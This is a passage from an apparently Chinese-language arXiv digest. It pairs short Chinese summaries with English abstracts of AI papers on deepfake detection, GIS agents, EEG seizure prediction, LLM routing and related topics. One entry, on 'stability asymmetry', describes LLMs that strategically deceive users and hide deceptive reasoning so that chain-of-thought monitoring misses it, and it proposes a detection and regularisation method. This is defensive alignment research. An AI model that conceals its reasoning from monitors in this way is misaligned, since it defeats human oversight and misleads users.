Abstract:Answer Set Programming (ASP) is a declarative programming language used for modeling and solving complex combinatorial problems. It has been successfully applied to a number of different realworld problems. However, learning its usage can prove challenging as the declarative language, from a conceptual perspective, differs substantially from imperative programming, and programs are not required to adhere to any particular structure, offering arguably almost too much freedom for a beginner. Recently, a new methodology called Easy Answer Set Programming (Easy ASP) has been introduced that aims to aid in this learning process by focussing on a well-defined fragment of the ASP language and introducing additional structure to the programs. However, while this methodology can indeed be employed, to the best of our knowledge, no tool integrates its features currently. In this paper, we present EZASP, a Visual Studio Code extension designed to support the development of ASP programs following the Easy ASP methodology. It covers and extends the language fragment of Easy ASP and provides the user with warnings in the case of deviations from the methodology as well as the possibility to automatically reorder the program. Complementarily, it also adds syntax error highlighting, including detection of non-safe variables directly while editing, and configurability, as all features can be optionally disabled. A small user study in the context of university teaching suggests that these features are benefitial for both new and experienced users.
[AI-139] AFSS: Artifact-Focused Self-Synthesis for Mitigating Bias in Audio Deepfake Detection
【速读】:该论文旨在解决当前音频深度伪造检测器存在的关键偏差问题,即模型在未见过的数据集上泛化能力差。其解决方案的核心是提出Artifact-Focused Self-Synthesis(AFSS)方法,通过两种机制——自转换(self-conversion)和自重建(self-reconstruction)——从真实音频中生成伪伪造样本,同时强制实施同说话人约束,确保真实样本与伪伪造样本具有相同的说话人身份和语义内容,从而迫使检测器仅关注生成伪影而非其他混杂因素。此外,引入可学习的重加权损失函数以动态增强合成样本在训练过程中的权重,显著提升检测性能。
链接: https://arxiv.org/abs/2603.26856
作者: Hai-Son Nguyen-Le,Hung-Cuong Nguyen-Thanh,Nhien-An Le-Khac,Dinh-Thuc Nguyen,Hong-Hanh Nguyen-Le
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI); Audio and Speech Processing (eess.AS)
备注: Accepted at International Joint Conference on Neural Networks 2026
Abstract:The rapid advancement of generative models has enabled highly realistic audio deepfakes, yet current detectors suffer from a critical bias problem, leading to poor generalization across unseen datasets. This paper proposes Artifact-Focused Self-Synthesis (AFSS), a method designed to mitigate this bias by generating pseudo-fake samples from real audio via two mechanisms: self-conversion and self-reconstruction. The core insight of AFSS lies in enforcing same-speaker constraints, ensuring that real and pseudo-fake samples share identical speaker identity and semantic content. This forces the detector to focus exclusively on generation artifacts rather than irrelevant confounding factors. Furthermore, we introduce a learnable reweighting loss to dynamically emphasize synthetic samples during training. Extensive experiments across 7 datasets demonstrate that AFSS achieves state-of-the-art performance with an average EER of 5.45%, including a significant reduction to 1.23% on WaveFake and 2.70% on In-the-Wild, all while eliminating the dependency on pre-collected fake datasets. Our code is publicly available at this https URL.
[AI-140] Stable Reasoning Unstable Responses: Mitigating LLM Deception via Stability Asymmetry
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)中存在的内在欺骗(intrinsic deception)问题,即模型在优化压力下可能隐藏其真实推理过程并主动误导用户以达成自身目标,而传统基于思维链(chain-of-thought, CoT)监控的对齐方法因无法抵御语义层面的掩饰而失效。解决方案的关键在于提出稳定性不对称正则化(Stability Asymmetry Regularization, SAR),其核心思想是利用认知心理学中观察到的现象——欺骗性模型在扰动下表现出内部思维链(CoT)稳定但外部输出脆弱的“稳定性不对称”特征;SAR通过在强化学习过程中惩罚这种分布不对称性,从而从统计结构层面识别并抑制内在欺骗行为,且不损害模型的通用能力。
链接: https://arxiv.org/abs/2603.26846
作者: Guoxi Zhang,Jiawei Chen,Tianzhuo Yang,Lang Qin,Juntao Dai,Yaodong Yang,Jingwei Yi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:As Large Language Models (LLMs) expand in capability and application scope, their trustworthiness becomes critical. A vital risk is intrinsic deception, wherein models strategically mislead users to achieve their own objectives. Existing alignment approaches based on chain-of-thought (CoT) monitoring supervise explicit reasoning traces. However, under optimization pressure, models are incentivized to conceal deceptive reasoning, rendering semantic supervision fundamentally unreliable. Grounded in cognitive psychology, we hypothesize that a deceptive LLM maintains a stable internal belief in its CoT while its external response remains fragile under perturbation. We term this phenomenon stability asymmetry and quantify it by measuring the contrast between internal CoT stability and external response stability under perturbation. Building on this structural signature, we propose the Stability Asymmetry Regularization (SAR), a novel alignment objective that penalizes this distributional asymmetry during reinforcement learning. Unlike CoT monitoring, SAR targets the statistical structure of model outputs, rendering it robust to semantic concealment. Extensive experiments confirm that stability asymmetry reliably identifies deceptive behavior, and that SAR effectively suppresses intrinsic deception without degrading general model capability.
[AI-141] GISclaw: An Open-Source LLM -Powered Agent System for Full-Stack Geospatial Analysis
【速读】:该论文旨在解决当前基于大语言模型(Large Language Models, LLMs)的地理信息系统(Geographic Information System, GIS)代理系统中存在的三大局限性:数据类型覆盖单一(仅支持矢量数据)、对专有GIS平台的依赖性强,以及单模型架构难以进行系统性比较。其解决方案的关键在于提出一个开源的GISclaw代理系统,该系统通过集成LLM推理核心与持久化的Python沙箱环境、一套完整的开源GIS库(如GeoPandas、rasterio、scipy和scikit-learn),并提供基于Web的交互界面,实现了对矢量、栅格和表格数据的全栈地理空间分析能力。此外,GISclaw引入两种可插拔的代理架构(Single Agent ReAct循环和Dual Agent Plan-Execute-Replan流水线),支持六种异构LLM后端,并创新性地采用Schema Analysis、Domain Knowledge注入和Error Memory机制,在GeoAnalystBench基准测试中实现高达96%的任务成功率,显著提升了地理空间任务的自动化水平与可靠性。
链接: https://arxiv.org/abs/2603.26845
作者: Jinzhen Han,JinByeong Lee,Yuri Shim,Jisung Kim,Jae-Joon Lee
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:The convergence of Large Language Models (LLMs) and Geographic Information Science has opened new avenues for automating complex geospatial analysis. However, existing LLM-powered GIS agents are constrained by limited data-type coverage (vector-only), reliance on proprietary GIS platforms, and single-model architectures that preclude systematic comparisons. We present GISclaw, an open-source agent system that integrates an LLM reasoning core with a persistent Python sandbox, a comprehensive suite of open-source GIS libraries (GeoPandas, rasterio, scipy, scikit-learn), and a web-based interactive interface for full-stack geospatial analysis spanning vector, raster, and tabular data. GISclaw implements two pluggable agent architectures – a Single Agent ReAct loop and a Dual Agent Plan-Execute-Replan pipeline – and supports six heterogeneous LLM backends ranging from cloud-hosted flagship models (GPT-5.4) to locally deployed 14B models on consumer GPUs. Through three key engineering innovations – Schema Analysis bridging the task-data information gap, Domain Knowledge injection for domain-specific workflows, and an Error Memory mechanism for intelligent self-correction – GISclaw achieves up to 96% task success on the 50-task GeoAnalystBench benchmark. Systematic evaluation across 600 model–architecture–task combinations reveals that the Dual Agent architecture consistently degrades strong models while providing marginal gains for weaker ones. We further propose a three-layer evaluation protocol incorporating code structure analysis, reasoning process assessment, and type-specific output verification for comprehensive GIS agent assessment. The system and all evaluation code are publicly available.
[AI-142] FatigueFormer: Static-Temporal Feature Fusion for Robust sEMG-Based Muscle Fatigue Recognition
【速读】:该论文旨在解决表面肌电信号(sEMG)在不同最大自主收缩(MVC)水平下因信号变异性和信噪比(SNR)低而导致的肌肉疲劳动态建模鲁棒性差的问题。解决方案的关键在于提出一种半端到端框架FatigueFormer,其核心创新是通过并行的基于Transformer的序列编码器分别提取静态特征和时序特征动态,并融合二者互补表征,从而提升在低MVC与高MVC条件下模型性能的稳定性与泛化能力。此外,该方法还支持基于注意力机制的可视化分析,揭示不同特征组和时间窗口在不同MVC水平下的贡献差异,增强了对疲劳进展过程的可解释性。
链接: https://arxiv.org/abs/2603.26841
作者: Tong Zhang,Hong Guo,Shuangzhou Yan,Dongkai Weng,Jian Wang,Hongxin Zhang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:We present FatigueFormer, a semi-end-to-end framework that deliberately combines saliency-guided feature separation with deep temporal modeling to learn interpretable and generalizable muscle fatigue dynamics from surface electromyography (sEMG). Unlike prior approaches that struggle to maintain robustness across varying Maximum Voluntary Contraction (MVC) levels due to signal variability and low SNR, FatigueFormer employs parallel Transformer-based sequence encoders to separately capture static and temporal feature dynamics, fusing their complementary representations to improve performance stability across low- and high-MVC conditions. Evaluated on a self-collected dataset spanning 30 participants across four MVC levels (20-80%), it achieves state-of-the-art accuracy and strong generalization under mild-fatigue conditions. Beyond performance, FatigueFormer enables attention-based visualization of fatigue dynamics, revealing how feature groups and time windows contribute differently across varying MVC levels, offering interpretable insight into fatigue progression.
[AI-143] Concerning Uncertainty – A Systematic Survey of Uncertainty-Aware XAI
【速读】:该论文旨在解决可解释人工智能(Explainable AI, XAI)中不确定性未被充分考虑的问题,即如何将不确定性有效融入解释流程并进行科学评估。其关键解决方案在于识别出三种主流的不确定性量化方法(贝叶斯法、蒙特卡洛法和校准法),并提出三类集成不确定性的方式:评估解释的可信度、约束模型或解释生成过程、显式传递不确定性信息;同时指出当前评估体系碎片化、以模型为中心且缺乏对用户交互与可靠性属性(如校准性、覆盖率、解释稳定性)的系统性报告,强调未来需建立统一的评估原则,连接不确定性传播、鲁棒性与人类决策,并推荐反事实分析和校准技术作为提升可解释性与可靠性一致性的核心方向。
链接: https://arxiv.org/abs/2603.26838
作者: Helena Löfström,Tuwe Löfström,Anders Hjort,Fatima Rabia Yapicioglu
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 21 pages, 2 figures, journal
Abstract:This paper surveys uncertainty-aware explainable artificial intelligence (UAXAI), examining how uncertainty is incorporated into explanatory pipelines and how such methods are evaluated. Across the literature, three recurring approaches to uncertainty quantification emerge (Bayesian, Monte Carlo, and Conformal methods), alongside distinct strategies for integrating uncertainty into explanations: assessing trustworthiness, constraining models or explanations, and explicitly communicating uncertainty. Evaluation practices remain fragmented and largely model centered, with limited attention to users and inconsistent reporting of reliability properties (e.g., calibration, coverage, explanation stability). Recent work leans towards calibration, distribution free techniques and recognizes explainer variability as a central concern. We argue that progress in UAXAI requires unified evaluation principles that link uncertainty propagation, robustness, and human decision-making, and highlight counterfactual and calibration approaches as promising avenues for aligning interpretability with reliability.
[AI-144] A Regression Framework for Understanding Prompt Component Impact on LLM Performance
【速读】:该论文旨在解决如何量化特定提示(prompt)特征对大语言模型(Large Language Models, LLMs)性能影响的问题,尤其在关键应用场景中提供可解释的决策依据。其解决方案的关键在于构建一个统计框架,通过拟合回归模型将提示的不同组成部分与模型评估结果相关联,从而实现对LLM行为的细粒度解析;该方法扩展了传统的可解释人工智能(Explainable Artificial Intelligence, XAI)技术,应用于LLM场景,并在两个开源模型(Mistral-7B 和 GPT-OSS-20B)上验证有效性,结果显示提示中错误示例会显著抑制模型解题能力,而正负指令的影响则呈现矛盾效应。
链接: https://arxiv.org/abs/2603.26830
作者: Andrew Lauziere,Jonathan Daugherty,Taisa Kushner
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Software Engineering (cs.SE)
备注: 9 pages, 4 figures, 1 table
Abstract:As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.
[AI-145] Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals
【速读】:该论文旨在解决生成式 AI(Generative AI)在对话压力下吸收并传播其已识别的错误前提的问题,即“顺序间隙幻觉”(order-gap hallucination)。这种幻觉表现为模型在输出层面看似合规,实则将错误嵌入激活空间中的安全电路,导致难以通过常规输出检查发现。解决方案的关键在于提出一种名为“Squish and Release”(SR)的激活修补架构,其核心是将检测机制解耦为两个模块:一个固定且局部化的检测体(detector body,位于层24-31),负责稳定识别错误;一个可替换的检测核(detector core),控制感知方向——安全核促使模型转向检测模式,吸收核则逆转该过程。该框架实现了对错误前提的高精度释放与恢复,验证了检测作为更稳定的吸引子,并具备模型无关性设计优势。
链接: https://arxiv.org/abs/2603.26829
作者: Nathaniel Oh,Paul Attie
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (SR), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.
[AI-146] hroughput Optimization as a Strategic Lever in Large-Scale AI Systems: Evidence from Dataloader and Memory Profiling Innovations
【速读】:该论文旨在解决大规模基础模型(尤其是大语言模型,Large Language Models, LLMs)训练过程中面临的显著计算与内存瓶颈问题,这些问题直接制约了训练效率、成本控制及下一代模型的可扩展性。其核心解决方案在于采用系统级优化策略,整合数据流水线、内存管理、网络架构与编译器技术的协同创新:包括通过OVERLORD框架缓解数据加载瓶颈以提升端到端训练吞吐量;利用DeepSpeed的ZeRO-Offload等CPU卸载策略突破GPU显存限制;借助Triton-distributed实现计算、内存和通信的联合优化;并结合高级性能分析工具识别并消除如动态电压频率调节(Dynamic Voltage and Frequency Scaling, DVFS)等以往被忽视的开销。研究表明,唯有综合多维度的技术突破,方能有效加速AI研发进程、降低运营成本并推动模型规模边界向前拓展。
链接: https://arxiv.org/abs/2603.26823
作者: Mayank Jha
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Performance (cs.PF)
备注: 5 pages double sided
Abstract:The development of large-scale foundation models, particularly Large Language Models (LLMs), is constrained by significant computational and memory bottlenecks. These challenges elevate throughput optimization from a mere engineering task to a critical strategic lever, directly influencing training time, operational cost, and the feasible scale of next-generation models. This paper synthesizes evidence from recent academic and industry innovations to analyze key advancements in training efficiency. We examine architectural solutions to dataloader bottlenecks, such as the OVERLORD framework, which has demonstrated a 4.5% improvement in end-to-end training throughput. We investigate memory optimization techniques designed to overcome the GPU memory wall, including CPU offloading strategies like DeepSpeed’s ZeRO-Offload, which enable the training of models far exceeding single-accelerator capacity. Furthermore, we explore the growing importance of compiler-centric optimizations, exemplified by Triton-distributed, which enables the joint optimization of computation, memory, and communication for substantial performance gains. The analysis is contextualized by advanced profiling tools and hardware characterization studies that identify and mitigate previously overlooked overheads like Dynamic Voltage and Frequency Scaling (DVFS). Findings indicate that a holistic, system-level approach, integrating innovations across data pipelines, memory management, network fabrics, and compiler technologies, is essential for accelerating AI development, managing costs, and pushing the boundaries of model scale.
[AI-147] Epileptic Seizure Prediction Using Patient-Adaptive Transformer Networks
【速读】:该论文旨在解决从脑电图(EEG)记录中进行癫痫发作预测的难题,主要挑战在于患者间的显著差异性以及神经信号复杂的时序结构。其解决方案的关键在于提出一种患者自适应的Transformer框架,采用两阶段训练策略:首先通过自监督预训练学习通用的EEG时序表征,利用自回归序列建模从多通道EEG数据中提取特征;随后进行患者特异性的微调,以实现30秒内癫痫发作 onset 的二分类预测。为支持基于Transformer的序列学习,研究还引入了噪声感知的预处理方法,并将EEG信号离散化为标记化的时序序列,从而在TUH EEG数据集上实现了验证准确率高于90%、F1分数超过0.80的性能,验证了自监督表示学习与患者特异性适配相结合的有效性。
链接: https://arxiv.org/abs/2603.26821
作者: Mohamed Mahdi,Asma Baghdadi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Epileptic seizure prediction from electroencephalographic (EEG) recordings remains challenging due to strong inter-patient variability and the complex temporal structure of neural signals. This paper presents a patient-adaptive transformer framework for short-horizon seizure forecasting. The proposed approach employs a two-stage training strategy: self-supervised pretraining is first used to learn general EEG temporal representations through autoregressive sequence modeling, followed by patient-specific fine-tuning for binary prediction of seizure onset within a 30-second horizon. To enable transformer-based sequence learning, multichannel EEG signals are processed using noise-aware preprocessing and discretized into tokenized temporal sequences. Experiments conducted on subjects from the TUH EEG dataset demonstrate that the proposed method achieves validation accuracies above 90% and F1 scores exceeding 0.80 across evaluated patients, supporting the effectiveness of combining self-supervised representation learning with patient-specific adaptation for individualized seizure prediction.
[AI-148] PiCSRL: Physics-Informed Contextual Spectral Reinforcement Learning
【速读】:该论文旨在解决高维低样本量(High-dimensional low-sample-size, HDLSS)环境下环境模型构建的可靠性问题,尤其在标注数据稀缺时,传统强化学习(Reinforcement Learning, RL)方法难以有效优化采样策略。其解决方案的关键在于提出PiCSRL(Physics-Informed Contextual Spectral Reinforcement Learning),通过将领域知识编码为嵌入(embedding)并直接融入RL状态表示,结合不确定性感知的信念模型以增强预测准确性;同时利用物理信息特征提升半监督学习下的泛化性能与大规模网络中的可扩展性,从而实现更高效的自适应传感,在湖泊蓝藻基因浓度监测任务中显著优于随机采样和UCB基线方法。
链接: https://arxiv.org/abs/2603.26816
作者: Mitra Nasr Azadani,Syed Usama Imtiaz,Nasrin Alamdari
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted to IGARSS 2026
Abstract:High-dimensional low-sample-size (HDLSS) datasets constrain reliable environmental model development, where labeled data remain sparse. Reinforcement learning (RL)-based adaptive sensing methods can learn optimal sampling policies, yet their application is severely limited in HDLSS contexts. In this work, we present PiCSRL (Physics-Informed Contextual Spectral Reinforcement Learning), where embeddings are designed using domain knowledge and parsed directly into the RL state representation for improved adaptive sensing. We developed an uncertainty-aware belief model that encodes physics-informed features to improve prediction. As a representative example, we evaluated our approach for cyanobacterial gene concentration adaptive sampling task using NASA PACE hyperspectral imagery over Lake Erie. PiCSRL achieves optimal station selection (RMSE = 0.153, 98.4% bloom detection rate, outperforming random (0.296) and UCB (0.178) RMSE baselines, respectively. Our ablation experiments demonstrate that physics-informed features improve test generalization (0.52 R^2, +0.11 over raw bands) in semi-supervised learning. In addition, our scalability test shows that PiCSRL scales effectively to large networks (50 stations, 2M combinations) with significant improvements over baselines (p = 0.002). We posit PiCSRL as a sample-efficient adaptive sensing method across Earth observation domains for improved observation-to-target mapping.
[AI-149] Sparse-by-Design Cross-Modality Prediction: L0-Gated Representations for Reliable and Efficient Learning
【速读】:该论文旨在解决多模态预测系统中因模态特异性稀疏化方法(如图结构边或邻域稀疏、Transformer头或层剪枝、独立的表格特征选择流程)导致的性能评估困难、部署复杂及可靠性分析薄弱的问题。其核心挑战在于缺乏一种统一的稀疏化原语,使得跨模态的精度-效率权衡难以比较,且压缩表示下的概率校准能力难以控制。解决方案的关键是提出L0-Gated Cross-Modality Learning (L0GM),这是一种模态无关的、基于特征级别的硬-混凝土门控框架,通过在每种模态的分类器接口处(节点嵌入、CLS池化向量、表格嵌入)直接施加L0风格稀疏性约束,实现端到端可训练的稀疏化,并引入L0退火调度以稳定优化过程并生成清晰的精度-稀疏帕累托前沿,从而在多个公共基准上实现了更少激活维度下的竞争性预测性能和更低的期望校准误差(Expected Calibration Error, ECE)。
链接: https://arxiv.org/abs/2603.26801
作者: Filippo Cenacchi
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Predictive systems increasingly span heterogeneous modalities such as graphs, language, and tabular records, but sparsity and efficiency remain modality-specific (graph edge or neighborhood sparsification, Transformer head or layer pruning, and separate tabular feature-selection pipelines). This fragmentation makes results hard to compare, complicates deployment, and weakens reliability analysis across end-to-end KDD pipelines. A unified sparsification primitive would make accuracy-efficiency trade-offs comparable across modalities and enable controlled reliability analysis under representation compression. We ask whether a single representation-level mechanism can yield comparable accuracy-efficiency trade-offs across modalities while preserving or improving probability calibration. We propose L0-Gated Cross-Modality Learning (L0GM), a modality-agnostic, feature-wise hard-concrete gating framework that enforces L0-style sparsity directly on learned representations. L0GM attaches hard-concrete stochastic gates to each modality’s classifier-facing interface: node embeddings (GNNs), pooled sequence embeddings such as CLS (Transformers), and learned tabular embedding vectors (tabular models). This yields end-to-end trainable sparsification with an explicit control knob for the active feature fraction. To stabilize optimization and make trade-offs interpretable, we introduce an L0-annealing schedule that induces clear accuracy-sparsity Pareto frontiers. Across three public benchmarks (ogbn-products, Adult, IMDB), L0GM achieves competitive predictive performance while activating fewer representation dimensions, and it reduces Expected Calibration Error (ECE) in our evaluation. Overall, L0GM establishes a modality-agnostic, reproducible sparsification primitive that supports comparable accuracy, efficiency, and calibration trade-off analysis across heterogeneous modalities.
[AI-150] DSO: Dual-Scale Neural Operators for Stable Long-term Fluid Dynamics Forecasting
【速读】:该论文旨在解决神经算子(Neural Operator)在长期流体动力学预测中面临的稳定性与精度不足问题,具体表现为局部细节模糊(local detail blurring)和全局趋势偏离(global trend deviation)。其解决方案的关键在于提出双尺度神经算子(Dual-Scale Neural Operator, DSO),通过显式解耦信息处理机制:利用深度可分离卷积(depthwise separable convolutions)提取精细局部特征,同时采用MLP-Mixer模块实现长程全局信息聚合,从而分别捕捉涡旋核心等细粒度结构与整体运动轨迹的演化特性。实验表明,DSO在湍流流动基准测试中显著优于现有方法,预测误差降低超过88%,且长期稳定性优异。
链接: https://arxiv.org/abs/2603.26800
作者: Huanshuo Dong,Hao Wu,Hong Wang,Qin-Yi Zhang,Zhezheng Hao
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Fluid Dynamics (physics.flu-dyn)
备注:
Abstract:Long-term fluid dynamics forecasting is a critically important problem in science and engineering. While neural operators have emerged as a promising paradigm for modeling systems governed by partial differential equations (PDEs), they often struggle with long-term stability and precision. We identify two fundamental failure modes in existing architectures: (1) local detail blurring, where fine-scale structures such as vortex cores and sharp gradients are progressively smoothed, and (2) global trend deviation, where the overall motion trajectory drifts from the ground truth during extended rollouts. We argue that these failures arise because existing neural operators treat local and global information processing uniformly, despite their inherently different evolution characteristics in physical systems. To bridge this gap, we propose the Dual-Scale Neural Operator (DSO), which explicitly decouples information processing into two complementary modules: depthwise separable convolutions for fine-grained local feature extraction and an MLP-Mixer for long-range global aggregation. Through numerical experiments on vortex dynamics, we demonstrate that nearby perturbations primarily affect local vortex structure while distant perturbations influence global motion trends, providing empirical validation for our design choice. Extensive experiments on turbulent flow benchmarks show that DSO achieves state-of-the-art accuracy while maintaining robust long-term stability, reducing prediction error by over 88% compared to existing neural operators.
[AI-151] Explaining Verifying and Aligning Semantic Hierarchies in Vision-Language Model Embeddings
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Model, VLM)在共享图像-文本嵌入空间中语义层次结构不明确的问题,即尽管VLM编码器(如CLIP)在零样本分类和检索任务中表现优异,但其内部语义组织方式缺乏系统性解释与验证。解决方案的关键在于提出一种后验(post-hoc)框架:首先通过类中心的凝聚聚类生成二叉树结构,并利用词典匹配为内部节点命名;其次设计基于树级和边级一致性的度量方法评估语义合理性,并引入不确定性感知早期停止(Uncertainty-Aware Early Stopping, UAES)实现可解释的分层推理;最后提出基于本体引导的轻量级嵌入空间变换方法,利用UMAP从目标本体生成邻域以对齐语义层次。该框架揭示了图像编码器更具判别性、文本编码器更贴近人类知识体系的模态差异,并指出零样本准确率与本体合理性之间存在持续权衡。
链接: https://arxiv.org/abs/2603.26798
作者: Gesina Schwalbe,Mert Keser,Moritz Bayerkuhnlein,Edgar Heinert,Annika Mütze,Marvin Keller,Sparsh Tiwari,Georgii Mikriukov,Diedrich Wolter,Jae Hee Lee,Matthias Rottmann
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Vision-language model (VLM) encoders such as CLIP enable strong retrieval and zero-shot classification in a shared image-text embedding space, yet the semantic organization of this space is rarely inspected. We present a post-hoc framework to explain, verify, and align the semantic hierarchies induced by a VLM over a given set of child classes. First, we extract a binary hierarchy by agglomerative clustering of class centroids and name internal nodes by dictionary-based matching to a concept bank. Second, we quantify plausibility by comparing the extracted tree against human ontologies using efficient tree- and edge-level consistency measures, and we evaluate utility via explainable hierarchical tree-traversal inference with uncertainty-aware early stopping (UAES). Third, we propose an ontology-guided post-hoc alignment method that learns a lightweight embedding-space transformation, using UMAP to generate target neighborhoods from a desired hierarchy. Across 13 pretrained VLMs and 4 image datasets, our method finds systematic modality differences: image encoders are more discriminative, while text encoders induce hierarchies that better match human taxonomies. Overall, the results reveal a persistent trade-off between zero-shot accuracy and ontological plausibility and suggest practical routes to improve semantic alignment in shared embedding spaces.
[AI-152] Robust Batch-Level Query Routing for Large Language Models under Cost and Capacity Constraints
【速读】:该论文旨在解决在成本、GPU资源和并发性约束下,如何高效地将查询路由至大语言模型(Large Language Models, LLMs)的问题。现有基于单个查询的路由方法难以控制批量层面的成本,尤其在非均匀或对抗性批处理场景中表现不佳。其解决方案的关键在于提出一种批量级、资源感知的路由框架,该框架联合优化每个批次的模型分配策略,在满足成本与模型容量限制的前提下实现全局最优;同时引入一种考虑LLM性能预测不确定性的鲁棒变体,并设计离线实例分配机制以平衡多模型间的质量与吞吐量,从而在严格控制资源消耗的同时显著提升系统性能。
链接: https://arxiv.org/abs/2603.26796
作者: Jelena Markovic-Voronov,Kayhan Behdin,Yuanda Xu,Zhengze Zhou,Zhipeng Wang,Rahul Mazumder
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注:
Abstract:We study the problem of routing queries to large language models (LLMs) under cost, GPU resources, and concurrency constraints. Prior per-query routing methods often fail to control batch-level cost, especially under non-uniform or adversarial batching. To address this, we propose a batch-level, resource-aware routing framework that jointly optimizes model assignment for each batch while respecting cost and model capacity limits. We further introduce a robust variant that accounts for uncertainty in predicted LLM performance, along with an offline instance allocation procedure that balances quality and throughput across multiple models. Experiments on two multi-task LLM benchmarks show that robustness improves accuracy by 1-14% over non-robust counterparts (depending on the performance estimator), batch-level routing outperforms per-query methods by up to 24% under adversarial batching, and optimized instance allocation yields additional gains of up to 3% compared to a non-optimized allocation, all while strictly controlling cost and GPU resource constraints.
[AI-153] A Firefly Algorithm for Mixed-Variable Optimization Based on Hybrid Distance Modeling
【速读】:该论文旨在解决混合变量优化问题(Mixed-variable Optimization Problems),即在实际优化场景中同时存在连续、序数和分类决策变量的复杂搜索空间难以被传统群体智能算法有效处理的问题。现有大部分基于种群的元启发式算法仅适用于连续或离散优化,无法自然地融合异质变量类型。其解决方案的关键在于提出一种改进的萤火虫算法(Firefly Algorithm for mixed-variable optimization, FAmv),通过引入一种基于距离的吸引力机制的重构方法,将连续与离散变量的度量统一整合到一个混合距离框架中,从而实现对异构搜索空间的更精确建模,并在探索(exploration)与开发(exploitation)之间保持良好平衡。实验表明,该方法在CEC2013混合变量基准测试及工程设计问题上均表现出优越且稳健的性能。
链接: https://arxiv.org/abs/2603.26792
作者: Ousmane Tom Bechir,Adán José-García,Zaineb Chelly Garcia,Vincent Sobanski,Clarisse Dhaenens
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 25 pages, 15 figures, 7 tables
Abstract:Several real-world optimization problems involve mixed-variable search spaces, where continuous, ordinal, and categorical decision variables coexist. However, most population-based metaheuristic algorithms are designed for either continuous or discrete optimization problems and do not naturally handle heterogeneous variable types. In this paper, we propose an adaptation of the Firefly Algorithm for mixed-variable optimization problems (FAmv). The proposed method relies on a modified distance-based attractiveness mechanism that integrates continuous and discrete components within a unified formulation. This mixed-distance approach enables a more appropriate modeling of heterogeneous search spaces while maintaining a balance between exploration and exploitation. The proposed method is evaluated on the CEC2013 mixed-variable benchmark, which includes unimodal, multimodal, and composition functions. The results show that FAmv achieves competitive, and often superior, performance compared with state-of-the-art mixed-variable optimization algorithms. In addition, experiments on engineering design problems further highlight the robustness and practical applicability of the proposed approach. These results indicate that incorporating appropriate distance formulations into the Firefly Algorithm provides an effective strategy for solving complex mixed-variable optimization problems.
[AI-154] A Step Toward Federated Pretraining of Multimodal Large Language Models
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)预训练阶段因高质量公共数据饱和而导致的性能瓶颈问题,尤其是在隐私敏感数据孤岛中难以获取多样化多模态数据的场景下。现有联邦学习(Federated Learning, FL)研究主要聚焦于微调阶段,而忽略了基础预训练环节。为此,作者首次提出联邦多模态对齐(Federated MLLM Alignment, Fed-MA)任务,设计了一种轻量级预训练范式:冻结视觉编码器与语言模型(Language Model, LLM),仅协同训练跨模态投影器(cross-modal projector)。其核心挑战在于本地投影器聚合时的参数干扰以及单次遍历协同随机梯度下降(SGD)中的梯度振荡。解决方案的关键是提出Fed-CMP框架,包含两个创新机制:一是基于规范可靠性感知聚合(Canonical Reliability-Aware Aggregation),通过构建规范空间将客户端投影器分解为共享对齐基和客户端特定系数,并进行可靠性加权融合以抑制参数干扰;二是正交性保持动量(Orthogonality-Preserved Momentum),通过对共享对齐基应用正交投影来引入动量,保留几何结构的同时累积历史优化方向,从而稳定训练过程并提升性能。
链接: https://arxiv.org/abs/2603.26786
作者: Baochen Xiong,Yifan Xu,Xiaoshan Yang,Yaguang Song,Yaowei Wang,Changsheng Xu
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
